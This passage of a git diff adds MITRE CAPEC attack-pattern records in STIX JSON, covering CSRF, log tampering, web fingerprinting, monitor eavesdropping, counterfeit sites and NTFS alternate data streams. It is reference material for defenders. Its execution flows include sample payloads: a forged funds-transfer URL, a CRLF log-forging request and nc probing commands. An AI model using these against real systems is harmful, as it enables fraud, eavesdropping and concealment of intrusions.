+ "description": "Cross-Site Request Forgery", + "external_id": "09", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Cross-Site-Request-Forgery" + }, + { + "description": "Cross 
Site Request Forgery (CSRF)", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/csrf" + }, + { + "description": "Thomas Schreiber, Session Riding: A Widespread Vulnerability in Today's Web Applications, SecureNet GmbH", + "external_id": "REF-62", + "source_name": "reference_from_CAPEC", + "url": "https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-602", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.html" + } + ], + "id": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Cross Site Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Session Riding" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.\n The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.\n The attacker can have the script embedded in, or targeted 
by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Explore target website: The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.

  2. Techniques
    Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server
    Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server
    View HTML source of web pages that contain links or buttons that perform actions of interest.

Experiment

  1. Create a link that when clicked on, will execute the interesting functionality.: The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.

  2. Techniques
    Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)
    Create a form that will submit a POST request (e.g.

Exploit

  1. Convince user to click on link: Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.

  2. Techniques
    Execute a phishing attack and send the user an e-mail convincing them to click on a link.
    Execute a stored XSS attack on a website to permanently embed the malicious link into the website.
    Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.
    Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4" + ], + "x_capec_resources_required": [ + "All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json new file mode 100644 index 0000000000000000000000000000000000000000..c8378c7225f9f65051e5c1cb02c8f6b14f23c88a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json 
@@ -0,0 +1,49 @@ +{ + "id": "bundle--846f1965-3494-4a8f-af2b-e10356d8a807", + "objects": [ + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary physically disables networking hardware by powering it down or disconnecting critical equipment. Disabling or shutting off critical system resources prevents them from performing their service as intended, which can have direct and indirect consequences on other systems. This attack pattern is considerably less technical than the selective blocking used in most obstruction attacks.", + "external_references": [ + { + "external_id": "CAPEC-583", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/583.html" + }, + { + "description": "Analysis of Country-wide Internet Outages Caused by Censorship, 2011, Center for Applied Internet Data Analysis", + "external_id": "REF-464", + "source_name": "reference_from_CAPEC", + "url": "http://www.caida.org/publications/papers/2011/outages_censorship/outages_censorship.pdf" + } + ], + "id": "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Disabling Network Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Hardware" + ], + "x_capec_prerequisites": [ + "The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json new file mode 100644 index 0000000000000000000000000000000000000000..0c2c4d0966a9cee6b51d2de92be3d384c5600875 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json 
@@ -0,0 +1,73 @@ +{ + "id": "bundle--acca830b-0515-460e-80ab-4681e294b274", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. 
The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.", + "external_references": [ + { + "external_id": "CAPEC-385", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/385.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Transaction or Event Tampering via Application API Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications (CAPEC-94) between the client and server, such as a man-in-the-middle proxy." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67.json new file mode 100644 index 0000000000000000000000000000000000000000..32b099c271049f749a209d43885284b47ab037b4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67.json 
@@ -0,0 +1,70 @@ +{ + "id": "bundle--8340da62-8f2a-4c99-a71c-1d8f3bc6323f", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An Adversary can eavesdrop on the content of an external monitor through the air without modifying any cable or installing software, just capturing this signal emitted by the cable or video port, with this the attacker will be able to impact the confidentiality of the data without being detected by traditional security tools", + "external_references": [ + { + "external_id": "CAPEC-699", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/699.html" + }, + { + "external_id": "CWE-1300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1300.html" + }, + { + "description": "TempestSDR: An SDR Tool For Eavesdropping on Computer Screens Via Unintentionally Radiated RF", + "external_id": "REF-744", + "source_name": "reference_from_CAPEC", + "url": "https://www.rtl-sdr.com/tempestsdr-a-sdr-tool-for-eavesdropping-on-computer-screens-via-unintentionally-radiated-rf/" + }, + { + "description": "Dan Maloney, Exposing Computer Monitor Side-Channel Vulnerabilities with TempestSDR", + "external_id": "REF-745", + "source_name": "reference_from_CAPEC", + "url": "https://hackaday.com/2020/07/15/exposing-computer-monitor-side-channel-vulnerabilities-with-tempestsdr/" + } + ], + "id": "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Eavesdropping on a Monitor", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey Target: The adversary surveys the target location, looking for exposed display cables and locations to hide an SDR. This also includes looking for display cables or monitors placed close to a wall, where the SDR can be in range while behind the wall. The adversary also attempts to discover the resolution and refresh rate of the targeted display.

Experiment

  1. Find target using SDR: The adversary sets up an SDR near the target display cable or monitor. They use the SDR software to locate the corresponding frequency of the display cable. This is done by looking for interference peaks that change depending on what the screen is showing. The adversary notes down the possible frequencies of unintentional emission.

  2. Techniques
    An adversary can make use of many different commercially available SDR devices which are easy to setup such as a HackRF, Ubertooth, RTL-SDR, and many others.

Exploit

  1. Visualize Monitor Image: Once the SDR software has been used to identify the target, the adversary will record the transmissions and visualize the monitor image using these transmissions, which allows them to eavesdrop on the information visible on the monitor.

  2. Techniques
    The TempestSDR software can be used in conjunction an SDR device to visualize the monitor image. The adversary will specify the known monitor resolution and refresh rate, or if those are not known they can use the provided auto-correlation graphs to help predict these values. The adversary will then try the different frequencies recorded from the experiment phase, looking for a viewing monitor display. Low pass filters and gain can be manipulated to make the display image clearer.
", + "x_capec_extended_description": "\n This attack gives the adversary the ability to view an external monitor with an insignificant delay. There is also no indicator of compromise from the victim visible on the monitor.\n The eavesdrop is possible due to a signal leakage, that is produced at different points of the connection, including the source port, the connection between the cable and PC, the cable itself, and the connection between the cable and the monitor. That signal leakage can be captured near any of the leak points, but also in a near location, like the next room or a few meters away, using an SDR (Software-defined Radio) device and the correspondent software, that process and interpret the signal to show attackers what the monitor is displaying.\n From the victim’s point of view, this specified attack might cause a high risk, and from the other hand, from the attacker’s point of view, the attack is excellent, since the specified attack method can be used without investing too much effort or require too many skills, as long as the right attack tool is in right place, this allows attackers to completely compromise the confidentiality of the data; also giving the attacker the advantage of being undetectable by not only traditional security products but also from bug sweep because the SDR device is acting in passive mode.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Victim should use an external monitor device", + "Physical access to the target location and devices" + ], + "x_capec_resources_required": [ + "SDR device set with the correspondent antenna", + "Computer with SDR Software" + ], + "x_capec_skills_required": { + "Low": "Understanding of computing hardware, to identify the video cable and video ports", + "Medium": "Knowledge of how to use the SDR and related software: With this knowledge, the adversary will find the correct frequency where the signal is being leaked" + }, + "x_capec_status": "Draft", + 
"x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json new file mode 100644 index 0000000000000000000000000000000000000000..c6e9a7fab9444c87bad57b402f70bd7cfb7fb9bb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json 
@@ -0,0 +1,110 @@ +{ + "id": "bundle--5e35451a-bdcf-469a-b35e-217164fc7416", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to \"Log Injection-Tampering-Forging\" except that in this case, the attack is targeting the logs of the web server and not the application.", + "external_references": [ + { + "external_id": "CAPEC-81", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/81.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-93", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-221", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/221.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-279", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/279.html" + }, + { + "external_id": "CWE-116", + 
"source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Server Logs Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application Web Server Log File Format: The attacker observes the system and looks for indicators of which logging utility is being used by the web server.

  2. Techniques
    Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information.

Experiment

  1. Determine Injectable Content: The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.

  2. Techniques
    Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

  2. Techniques
    \n Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    Directly through log file or database manipulation, modify existing log entries.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Target server software must be a HTTP server that performs web logging." + ], + "x_capec_resources_required": [ + "Ability to send specially formatted HTTP request to web server" + ], + "x_capec_skills_required": { + "Low": "To input faked entries into Web logs" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json new file mode 100644 index 0000000000000000000000000000000000000000..c13db57a88a11856bc2f8a986647757afb3193dd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json 
@@ -0,0 +1,84 @@ +{ + "id": "bundle--2f7ae244-5d8b-45d0-b28a-06555424ecba", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker sends a series of probes to a web application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.", + "external_references": [ + { + "external_id": "CAPEC-170", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/170.html" + }, + { + "external_id": "CWE-497", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/497.html" + }, + { + "description": "Saumil Shah, An Introduction to HTTP fingerprinting", + "external_id": "REF-36", + "source_name": "reference_from_CAPEC", + "url": "http://www.net-square.com/httprint_paper.html" + }, + { + "description": "OWASP Web Security Testing Guide (v4 [DRAFT]), The Open Web Application Security Project (OWASP)", + "external_id": "REF-37", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework" + }, + { + "description": "HTTP 1.1 Specification (RFC 2616), IETF RFC", + "external_id": "REF-38", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc2616.txt" + }, + { + 
"description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-39", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Fingerprinting" + } + ], + "id": "attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Application Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Information Leakage)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.\n Response from Apache 1.3.23\n $ nc apache.server.com80 GET / HTTP/3.0\n HTTP/1.1 400 Bad RequestDate: Sun, 15 Jun 2003 17:12: 37 GMTServer: Apache/1.3.23Connection: closeTransfer: chunkedContent-Type: text/HTML; charset=iso-8859-1\n Response from IIS 5.0\n $ nc iis.server.com 80GET / HTTP/3.0\n HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.com/Default.htmDate: Fri, 01 Jan 1999 20:14: 02 GMTContent-Type: text/HTMLAccept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMTETag: W/e0d362a4c335be1: ae1Content-Length: 133\n [REF-37]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Request fingerprinting: Use automated tools or send web server specific commands to web server and wait for server's response.

  2. Techniques
    Use automated tools or send web server specific commands to web server and then receive server's response.

Experiment

  1. Increase the accuracy of server fingerprinting of Web servers: Attacker usually needs to send several different commands to accurately identify the web server. Attacker can also use automated tools to send requests to the server. The responses of the server may be different in terms of protocol behavior.

  2. Techniques
    Observe the ordering of the several HTTP response headers. The ordering of the header of each server may have unique identities.
    Send bad requests or requests of nonexistent pages to the server.
    Attacker takes existing automated tools to recognize the type and the version of the web server in use.
  3. Identify Web Application Software: After the web server platform software has been identified, the attacker start to identify web application technologies such as ASP, .NET, PHP and Java on the server.

  4. Techniques
    Examine the file name extensions in URL, for example .php indicates PHP script interfaced with Apache server.
    Examine the HTTP Response Headers. This may leak information about software signatures
    Examine Cookies that may contain server's software information.
    Check error pages.
  5. Identify Backend Database Version: Determining the database engine type can assist attackers' attempt to successfully execute SQL injection. Some database API such as ODBC will show a database type as part of the driver information when reporting an error.

  6. Techniques
    Use tools to send bogus SQL query to the server and check error pages.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Any web application can be fingerprinted. However, some configuration choices can limit the useful information an attacker may collect during a fingerprinting attack." + ], + "x_capec_resources_required": [ + "While simple fingerprinting can be accomplished with only a web browser, for more thorough fingerprinting an attacker requires a variety of tools to collect information about the target. These tools might include protocol analyzers, web-site crawlers, and fuzzing tools. Footprinting a service adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected." + ], + "x_capec_skills_required": { + "Low": "Attacker knows how to send HTTP request, SQL query to a web application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json new file mode 100644 index 0000000000000000000000000000000000000000..bbdb61b31a48e38326720bd770c00eba1ff60428 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json 
@@ -0,0 +1,55 @@ +{ + "id": "bundle--fdfdc2b9-1600-4cde-b9e8-6a591b35740f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.", + "external_references": [ + { + "external_id": "CAPEC-543", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/543.html" + }, + { + "description": "Masquerading: Match Legitimate Name or Location", + "external_id": "T1036.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/005" + } + ], + "id": "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Websites", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285" + ], + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json new file mode 100644 index 0000000000000000000000000000000000000000..2b18ae8f54fba48982522b79da6dacf401fd06ed --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json 
@@ -0,0 +1,57 @@ +{ + "id": "bundle--7b20b768-0707-4aa2-b71f-06e623a4cb00", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits the functionality of Microsoft NTFS Alternate Data Streams (ADS) to undermine system security. ADS allows multiple \"files\" to be stored in one directory entry referenced as filename:streamname. One or more alternate data streams may be stored in any file or directory. Normal Microsoft utilities do not show the presence of an ADS stream attached to a file. The additional space for the ADS is not recorded in the displayed file size. The additional space for ADS is accounted for in the used space on the volume. An ADS can be any type of file. ADS are copied by standard Microsoft utilities between NTFS volumes. ADS can be used by an attacker or intruder to hide tools, scripts, and data from detection by normal system utilities. Many anti-virus programs do not check for or scan ADS. 
Windows Vista does have a switch (-R) on the command line DIR command that will display alternate streams.", + "external_references": [ + { + "external_id": "CAPEC-168", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/168.html" + }, + { + "external_id": "CWE-212", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/212.html" + }, + { + "external_id": "CWE-69", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/69.html" + }, + { + "description": "Windows alternate data stream", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Windows_alternate_data_stream" + } + ], + "id": "attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Windows ::DATA Alternate Data Stream", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target must be running the Microsoft NTFS file system." + ], + "x_capec_resources_required": [ + "The attacker must have command line or programmatic access to the target's files system with write/read permissions." + ], + "x_capec_status": "Draft", + 